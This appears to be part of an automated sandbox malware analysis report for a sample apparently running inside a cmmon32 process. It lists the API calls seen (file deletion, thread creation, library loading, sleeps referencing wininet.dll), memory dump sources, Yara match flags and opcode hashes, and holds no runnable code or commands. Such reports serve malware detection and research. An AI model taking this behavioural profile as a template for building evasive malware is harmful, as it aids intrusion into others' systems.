                                                            • Opcode ID: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction ID: 743f04878c3dbdb859a75713d6161858b0dbc62298b6ef153dbab012d598b82f
                                                            • Opcode Fuzzy Hash: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction Fuzzy Hash: 0BF0AEB6210218ABCB18EF89DC85EAB77ADAF88754F118159BE0997241C630F911CBB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtClose.NTDLL(027CE525,00000000,?,027CE525,?,?,?,?,?,?,?,00000000,?,00000000), ref: 027DC895
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction ID: e8bf81e21b33febc344093a2747bac5a80b982915da83a46d1b62be79981393b
                                                            • Opcode Fuzzy Hash: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction Fuzzy Hash: 64D01772240214ABD620EBA8DC89E9B7BADDF88660F018459BA1D5B242C530FA008AE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtDeleteFile.NTDLL(027D7482,00000002,?,027D7482,00000000,00000018,?,?,67F1BF61,00000000,?), ref: 027DC865
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: cb34cefa210aad1f2cd63b2e285f7a812f4a18ab9f97dea6380d9b3a81b756c1
                                                            • Instruction ID: 0d76c3b6f66553f012dd43e79a685940fc61365428461009ed32d49194fdaf63
                                                            • Opcode Fuzzy Hash: cb34cefa210aad1f2cd63b2e285f7a812f4a18ab9f97dea6380d9b3a81b756c1
                                                            • Instruction Fuzzy Hash: 8BD01772240214ABD620EB98DC89ED77BACDF88760F018455BA1D5B241C630FA008BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
                                                            • Instruction ID: b29610b91f9d3869451dfa8c52bd01758d00146856da6b81399bce423772e05a
                                                            • Opcode Fuzzy Hash: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
                                                            • Instruction Fuzzy Hash: DF900265261004032105A559070450701A6A7D5797751C021F1006650CD661D8757161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 67cf538b0b95da6cf89e9b1ce37bd5898c9ddf7226562b36240e6a2ca7feb6c0
                                                            • Instruction ID: 06b89f871a0971c9b6b8fe45c2d93a44c48b47a02cfacbf3a1f71c930e900ef3
                                                            • Opcode Fuzzy Hash: 67cf538b0b95da6cf89e9b1ce37bd5898c9ddf7226562b36240e6a2ca7feb6c0
                                                            • Instruction Fuzzy Hash: 6A900265271004022145A559060450B05A5B7D6797791C015F1407690CC661D8797361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
                                                            • Instruction ID: 0bc1ff4937e3ba340e7f1edb299a920f3251ced99a3d805916b077b2d53932e2
                                                            • Opcode Fuzzy Hash: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
                                                            • Instruction Fuzzy Hash: 5C9002A125200403610571594414616416AA7E0647F51C021E1005690DC565D8A57165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d31952984ae06274cfad80e1082a960d3fa5ef75f1006515c03640eb791fcd2f
                                                            • Instruction ID: 336e4ed7a3b6e7742ae7074724a0b7253fbb49886378e8bc8e5b7111a24fd116
                                                            • Opcode Fuzzy Hash: d31952984ae06274cfad80e1082a960d3fa5ef75f1006515c03640eb791fcd2f
                                                            • Instruction Fuzzy Hash: 3E90027125504C42F14071594404A460175A7D074BF51C011A0055794D9665DD69B6A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a57ee7e5b50d91a9f6d601ab951dfa3fcd6e3c4196d2e573192ffafcee0b5c47
                                                            • Instruction ID: 7dc497eaff9677bc7d1b56e9431d72fcf7187e7104dae95472cffe8082b36ed9
                                                            • Opcode Fuzzy Hash: a57ee7e5b50d91a9f6d601ab951dfa3fcd6e3c4196d2e573192ffafcee0b5c47
                                                            • Instruction Fuzzy Hash: E990027125100C02F1807159440464A0165A7D1747F91C015A0016754DCA55DA6D77E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 26ac796da86bd39976a67a3ec15253b975b8dd263972ef7ac24cac1766100e2b
                                                            • Instruction ID: 7c538085eb4296221452ff7a34a9fedebe0ca31360a61fc82e0165b4930ad55b
                                                            • Opcode Fuzzy Hash: 26ac796da86bd39976a67a3ec15253b975b8dd263972ef7ac24cac1766100e2b
                                                            • Instruction Fuzzy Hash: 3990027165500C02F150715944147460165A7D0747F51C011A0015754D8795DA6976E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
                                                            • Instruction ID: 889d0e15bb47f286039b010a476c14fea61578d6442d5a2f9f29d4a3dcbbceb2
                                                            • Opcode Fuzzy Hash: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
                                                            • Instruction Fuzzy Hash: DE90027125100C42F10061594404B460165A7E0747F51C016A0115754D8655D8657561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
                                                            • Instruction ID: 4e10ca3a3fe42c049bad4bdfb89407ca5306be41b1c0c4dd460edf60ae3592d2
                                                            • Opcode Fuzzy Hash: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
                                                            • Instruction Fuzzy Hash: 8690027125108C02F1106159840474A0165A7D0747F55C411A4415758D86D5D8A57161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
                                                            • Instruction ID: 7a6e8ab3648808f6f4ac5afd6173953cf8fad3d23d233fd5c3e394cab7571a06
                                                            • Opcode Fuzzy Hash: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
                                                            • Instruction Fuzzy Hash: 7390027125100802F100659954086460165A7E0747F51D011A5015655EC6A5D8A57171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
                                                            • Instruction ID: 59eafbbb9058fa4b32c821a5ab0951fdf15b27addcdce71b2efaeab1c22176fa
                                                            • Opcode Fuzzy Hash: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
                                                            • Instruction Fuzzy Hash: 5790027136114802F110615984047060165A7D1647F51C411A0815658D86D5D8A57162
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
                                                            • Instruction ID: 91b6eda25b6555d9c98beaf2d46df3b50950170664e9ff8f8351f0c14f28c05c
                                                            • Opcode Fuzzy Hash: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
                                                            • Instruction Fuzzy Hash: 1490026926300402F1807159540860A0165A7D1647F91D415A0006658CC955D87D7361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
                                                            • Instruction ID: d13f3d3d0d33525fe4be4dd28af7a832662f26890c8c6f2d434483573a18d8e3
                                                            • Opcode Fuzzy Hash: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
                                                            • Instruction Fuzzy Hash: 4B900261292045527545B15944045074166B7E0687B91C012A1405A50C8566E86AF661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
                                                            • Instruction ID: 4dccd26cc39d52c8672fbc7d86233c8cc2fba3171933d9bc2fb73989efd917a9
                                                            • Opcode Fuzzy Hash: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
                                                            • Instruction Fuzzy Hash: 6890027125100813F111615945047070169A7D0687F91C412A0415658D9696D966B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
                                                            • Instruction ID: c324a024072fcc2bef660928dc62e452dab71075663b4e6d26c0ea43b29ee4a0
                                                            • Opcode Fuzzy Hash: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
                                                            • Instruction Fuzzy Hash: 9F9002B125100802F140715944047460165A7D0747F51C011A5055654E8699DDE976A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
                                                            • Instruction ID: ec3bfbf4279e4b94579c097381f43948559d692bce8baf12a48c589efadc6b1b
                                                            • Opcode Fuzzy Hash: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
                                                            • Instruction Fuzzy Hash: D19002A139100842F10061594414B060165E7E1747F51C015E1055654D8659DC667166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
                                                            • Instruction ID: 4cacdffea3d314c1e4881e09cef95e4391045ebdf61be52ec85a6537f7e6af1c
                                                            • Opcode Fuzzy Hash: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
                                                            • Instruction Fuzzy Hash: F190026126180442F20065694C14B070165A7D0747F51C115A0145654CC955D8757561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 027DB54B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 83ada1723845c6952aa969ead9a3735fdd177ab5aebfb88c41cd298f33f339f1
                                                            • Instruction ID: 62f37a7d6e2bfdb39f897c934d88c56d1b02a6fb7690254f5d5792b7de5a0524
                                                            • Opcode Fuzzy Hash: 83ada1723845c6952aa969ead9a3735fdd177ab5aebfb88c41cd298f33f339f1
                                                            • Instruction Fuzzy Hash: 87319EB5600604ABD715DFA4D884FABB7F9FB88304F14851EE65E5B244D7B0B5448BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 027DB54B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: dd04b9617db62cb77718a9f9f30dde7b8823e9ae896c4d7a473cecb04fbe80eb
                                                            • Instruction ID: 584f8920b768d31fe8c6b9cc07bceed4ac8006be829e5346aa3b47bd2e07e2b7
                                                            • Opcode Fuzzy Hash: dd04b9617db62cb77718a9f9f30dde7b8823e9ae896c4d7a473cecb04fbe80eb
                                                            • Instruction Fuzzy Hash: 0C31E0B4A00204BBD714DFA4D885FAAF7B9FB44304F10812DEA5D6B244D7B0B5548BE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 027CFDD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID: @
                                                            • API String ID: 3188754299-2766056989
                                                            • Opcode ID: d8a87b0e6ab7944186ac67d32a5613fea81a6b2e25545153113b3b616fdbfee2
                                                            • Instruction ID: 5a0639f9b767b2f0632157b87fcab95163f6462f6984c96ff3202ec5a4e677ce
                                                            • Opcode Fuzzy Hash: d8a87b0e6ab7944186ac67d32a5613fea81a6b2e25545153113b3b616fdbfee2
                                                            • Instruction Fuzzy Hash: 047182B2900108ABDB26EB64CC88FFBB37DFF55304F04499DE51996181EB70A6858F61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 027D5237
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID: @J7<
                                                            • API String ID: 2538663250-2016760708
                                                            • Opcode ID: e006b69a5c18fdf335b8a2d7061c4d4c71bc06e8e72711ad79a66afbe72e67d8
                                                            • Instruction ID: 0bbea1aedd94cf172a8134ca771c464d0207b2e1acfbccc66371a3b3c0004dcc
                                                            • Opcode Fuzzy Hash: e006b69a5c18fdf335b8a2d7061c4d4c71bc06e8e72711ad79a66afbe72e67d8
                                                            • Instruction Fuzzy Hash: 71311EB6A0060AAFDB00DFD8D880DEFB7B9BF88304B508559E515EB214D775EE458BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(027D4232,?,?,027D4232,00000000,?), ref: 027CE7CA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 84c8d8da060dc3e854bc5ff66d7139c0fee64326bf9aa11a5049956298c3acca
                                                            • Instruction ID: 088873d5f9db66a74d3fac6a0b935aa338f03bb5874b6df342220e270acc4e8b
                                                            • Opcode Fuzzy Hash: 84c8d8da060dc3e854bc5ff66d7139c0fee64326bf9aa11a5049956298c3acca
                                                            • Instruction Fuzzy Hash: C731AE71201706AFD721DF74C8C4BC67F60FF49724F6806ACDA544B287DB29E042CA90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027CB1C2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction ID: 9849d3ba1bd75b0bb7ed039c69171e8f97bf15a702471ea74e027e7455897219
                                                            • Opcode Fuzzy Hash: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction Fuzzy Hash: 3A015EB5E4020DABDF10DAA0DC46FDEB7B99B14308F144198E909A7240F631EB04CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,078ACDDD,00000000,00000000,027CDDAA,?,?,?,078ACDDD,?), ref: 027DB612
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: a050dcef47728ac29ab368adc1541b2c598cdab5ced67e3ad3797b0fe75f6ca2
                                                            • Instruction ID: e604c1b1f37b449a96b4259ad16a89f2628ee1b563287702946579381064b949
                                                            • Opcode Fuzzy Hash: a050dcef47728ac29ab368adc1541b2c598cdab5ced67e3ad3797b0fe75f6ca2
                                                            • Instruction Fuzzy Hash: 5CF06D7378030436E72165EA9C02F9BB6ADDB85B71F540029FB0CEA2C0E992F8014AB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(027D6E26,?,027D75BD,027D75BD,?,027D6E26,00000000,?,?,?,?,00000000,00000000,00000002), ref: 027DCA3D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction ID: 633a1664f70b63ea7896942f02eef00bf35832967a4be2ef0112944d7fc6cf67
                                                            • Opcode Fuzzy Hash: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction Fuzzy Hash: 08E06DB1200214BBC724DF59CC45E973B6DEF85660F118059FD099B251C230E900CBF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(027D4232,?,?,027D4232,00000000,?), ref: 027CE7CA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
